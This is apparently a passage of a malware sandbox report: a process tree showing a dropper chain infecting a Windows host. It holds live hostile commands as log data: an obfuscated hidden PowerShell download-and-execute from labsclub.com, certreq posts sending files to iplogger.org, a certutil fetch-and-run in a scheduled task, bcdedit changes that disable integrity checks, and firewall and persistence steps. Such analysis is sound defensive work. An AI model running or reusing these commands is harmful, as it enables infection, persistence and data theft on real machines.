      - C:\Users\Admin\AppData\Roaming\1614545020682.exe
        
        "C:\Users\Admin\AppData\Roaming\1614545020682.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614545020682.txt"
        6⤵
        
        PID:4172
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:4720
      - C:\Users\Admin\AppData\Roaming\1614545026354.exe
        
        "C:\Users\Admin\AppData\Roaming\1614545026354.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614545026354.txt"
        6⤵
        
        PID:4736
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:4788
      - C:\Users\Admin\AppData\Roaming\1614545031579.exe
        
        "C:\Users\Admin\AppData\Roaming\1614545031579.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614545031579.txt"
        6⤵
        
        PID:4776
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        
        PID:5960
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        
        PID:7152
      - C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
        
        C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
        6⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\is-72HFE.tmp\23E04C4F32EF2158.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-72HFE.tmp\23E04C4F32EF2158.tmp" /SL5="$401F8,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
        7⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/14Zhe7"
        8⤵
        
        PID:6952
        
        C:\Program Files (x86)\DTS\seed.sfx.exe
        
        "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
        8⤵
        
        PID:6988
        
        C:\Program Files (x86)\Seed Trade\Seed\seed.exe
        
        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
        9⤵
        
        PID:6140
        
        C:\Program Files (x86)\Seed Trade\Seed\seed.exe
        
        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
        9⤵
        
        PID:6152
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"
        6⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:5424
    - - C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe
        
        C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp1
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3228
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:4100
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"
        6⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:4672
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2968
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:3284
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
      4⤵
      PID:3968
    - - C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        
        PID:2052
      - C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe" 1 3.1614545239.603c01574b346 101
        6⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NOWJBGHR9N\multitimer.exe" 2 3.1614545239.603c01574b346
        7⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\ct0u0yod2in\jw3ki4z0by4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ct0u0yod2in\jw3ki4z0by4.exe" /VERYSILENT
        8⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\is-QNFGG.tmp\jw3ki4z0by4.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QNFGG.tmp\jw3ki4z0by4.tmp" /SL5="$9011A,870426,780800,C:\Users\Admin\AppData\Local\Temp\ct0u0yod2in\jw3ki4z0by4.exe" /VERYSILENT
        9⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\is-RJNNQ.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RJNNQ.tmp\winlthst.exe" test1 test1
        10⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe"
        11⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BM0081UIn.exe"
        12⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\1614545090745.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1614545090745.exe"
        13⤵
        
        PID:6412
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        14⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\3uci3oedvp4\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3uci3oedvp4\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\is-2FEAL.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2FEAL.tmp\vict.tmp" /SL5="$90058,870426,780800,C:\Users\Admin\AppData\Local\Temp\3uci3oedvp4\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\is-L5T9I.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L5T9I.tmp\wimapi.exe" 535
        10⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe"
        11⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KYbmxrJmM.exe"
        12⤵
        
        PID:6632
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\cpdopndowqc\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cpdopndowqc\vpn.exe" /silent /subid=482
        8⤵
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\is-HC56M.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HC56M.tmp\vpn.tmp" /SL5="$1036C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\cpdopndowqc\vpn.exe" /silent /subid=482
        9⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:6420
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:6432
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:4016
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:2228
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\22xxc5zeexs\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22xxc5zeexs\chashepro3.exe" /VERYSILENT
        8⤵
        
        PID:4180
        
        C:\Users\Admin\AppData\Local\Temp\is-AJNU4.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AJNU4.tmp\chashepro3.tmp" /SL5="$1036E,3362400,58368,C:\Users\Admin\AppData\Local\Temp\22xxc5zeexs\chashepro3.exe" /VERYSILENT
        9⤵
        
        PID:4452
        
        C:\Program Files (x86)\JCleaner\gl.exe
        
        "C:\Program Files (x86)\JCleaner\gl.exe"
        10⤵
        
        PID:4424
        
        C:\Program Files (x86)\JCleaner\gl.exe
        
        "C:\Program Files (x86)\JCleaner\gl.exe"
        11⤵
        
        PID:7128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1hTS97"
        10⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1hTS97 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1hTS97 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:4176
        
        C:\Program Files (x86)\JCleaner\ww.exe
        
        "C:\Program Files (x86)\JCleaner\ww.exe"
        10⤵
        
        PID:5224
        
        C:\Program Files (x86)\JCleaner\ww.exe
        
        "C:\Program Files (x86)\JCleaner\ww.exe"
        11⤵
        
        PID:7020
        
        C:\Program Files (x86)\JCleaner\jayson.exe
        
        "C:\Program Files (x86)\JCleaner\jayson.exe"
        10⤵
        
        PID:5216
        
        C:\Program Files (x86)\JCleaner\jayson.exe
        
        "C:\Program Files (x86)\JCleaner\jayson.exe"
        11⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
        10⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1aSny7"
        10⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1EaGq7"
        10⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
        10⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe" /8-23
        8⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\rKuSdIHJXcsFnOtHgUyk\kdu.exe
        
        C:\Users\Admin\AppData\Local\Temp\rKuSdIHJXcsFnOtHgUyk\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\rKuSdIHJXcsFnOtHgUyk\driver.sys
        9⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gfc2bvbcpuq\app.exe" /8-23
        9⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\ZioOLrNbgKchFyRGddjOHPzXlZiCb\kdu.exe
        
        C:\Users\Admin\AppData\Local\Temp\ZioOLrNbgKchFyRGddjOHPzXlZiCb\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\ZioOLrNbgKchFyRGddjOHPzXlZiCb\driver.sys
        10⤵
        
        PID:6572
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        10⤵
        
        PID:6008
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        11⤵
        
        PID:6544
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        10⤵
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\Temp\gtdCtFJaAYXajdeIjyCgk\kdu.exe
        
        C:\Users\Admin\AppData\Local\Temp\gtdCtFJaAYXajdeIjyCgk\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\gtdCtFJaAYXajdeIjyCgk\driver.sys
        11⤵
        
        PID:7640
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        11⤵
        Creates scheduled task(s)
        
        PID:1712
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        11⤵
        Creates scheduled task(s)
        
        PID:64
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        11⤵
        
        PID:6092
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6472
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:7172
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:3280
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:7632
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:7832
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5884
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:784
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6576
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4388
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6256
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:7184
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:3672
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\lsaojlnmfxx\3zbpiccof5w.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lsaojlnmfxx\3zbpiccof5w.exe" /ustwo INSTALL
        8⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 648
        9⤵
        Program crash
        
        PID:4380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 668
        9⤵
        Program crash
        
        PID:3912
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 672
        9⤵
        Program crash
        
        PID:4988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 668
        9⤵
        Program crash
        
        PID:6328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 880
        9⤵
        Program crash
        
        PID:6740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 920
        9⤵
        Program crash
        
        PID:6408
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1176
        9⤵
        Program crash
        
        PID:5584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1196
        9⤵
        Program crash
        
        PID:6760
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1100
        9⤵
        Program crash
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\gbh32ukpkl4\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gbh32ukpkl4\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\nji4wcohnfp\lox3gm3jy35.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nji4wcohnfp\lox3gm3jy35.exe" 57a764d042bf8
        8⤵
        
        PID:4128
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\43L54VTWIR\43L54VTWI.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:724
        
        C:\Program Files\43L54VTWIR\43L54VTWI.exe
        
        "C:\Program Files\43L54VTWIR\43L54VTWI.exe" 57a764d042bf8
        10⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\hoimjtobtq3\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hoimjtobtq3\safebits.exe" /S /pubid=1 /subid=451
        8⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Roaming\OptioLink\pptlng.dll",pptlng C:\Users\Admin\AppData\Local\Temp\hoimjtobtq3\safebits.exe
        9⤵
        
        PID:6976
        
        C:\Users\Admin\AppData\Local\Temp\0okedxxjmwn\setup_10.2_us3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0okedxxjmwn\setup_10.2_us3.exe" /silent
        8⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\hx1e0e1ujm3\yzqrl2zfc2d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hx1e0e1ujm3\yzqrl2zfc2d.exe" testparams
        8⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\01kdzlo0cts\fjdx0pbfosp.exe
        
        "C:\Users\Admin\AppData\Roaming\01kdzlo0cts\fjdx0pbfosp.exe" /VERYSILENT /p=testparams
        9⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\is-TKBTK.tmp\fjdx0pbfosp.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TKBTK.tmp\fjdx0pbfosp.tmp" /SL5="$80078,1611272,61440,C:\Users\Admin\AppData\Roaming\01kdzlo0cts\fjdx0pbfosp.exe" /VERYSILENT /p=testparams
        10⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\d5n2zbhpp4m\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d5n2zbhpp4m\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\is-8K9AD.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8K9AD.tmp\IBInstaller_97039.tmp" /SL5="$2030A,14464800,721408,C:\Users\Admin\AppData\Local\Temp\d5n2zbhpp4m\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:696
        
        C:\Users\Admin\AppData\Local\Temp\is-8LINK.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8LINK.tmp\{app}\chrome_proxy.exe"
        10⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://dropskeyssellbuy.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        
        PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:720
    - - C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe"
        5⤵
        
        PID:4384
      - C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F7B4.tmp.exe"
        6⤵
        
        PID:4584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:4812
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4872
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:4644
    - - C:\ProgramData\2842927.31
        
        "C:\ProgramData\2842927.31"
        5⤵
        
        PID:4312
    - - C:\ProgramData\4755778.52
        
        "C:\ProgramData\4755778.52"
        5⤵
        
        PID:5232
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        
        PID:6104
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      PID:5548
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:5836
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:6400
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:6448
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:6820
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:4716

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0C22C3D3D64279B29FDB0A8DADBEF35E C
  2⤵
  - Loads dropped DLL
  PID:804
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:6836

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1408

C:\Users\Admin\AppData\Local\Temp\is-3QVS2.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3QVS2.tmp\Setup3310.tmp" /SL5="$701D2,802346,56832,C:\Users\Admin\AppData\Local\Temp\gbh32ukpkl4\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:428
- C:\Users\Admin\AppData\Local\Temp\is-5QPL4.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-5QPL4.tmp\Setup.exe" /Verysilent
  2⤵
  PID:6048
- - C:\Users\Admin\AppData\Local\Temp\is-25PVO.tmp\Setup.tmp
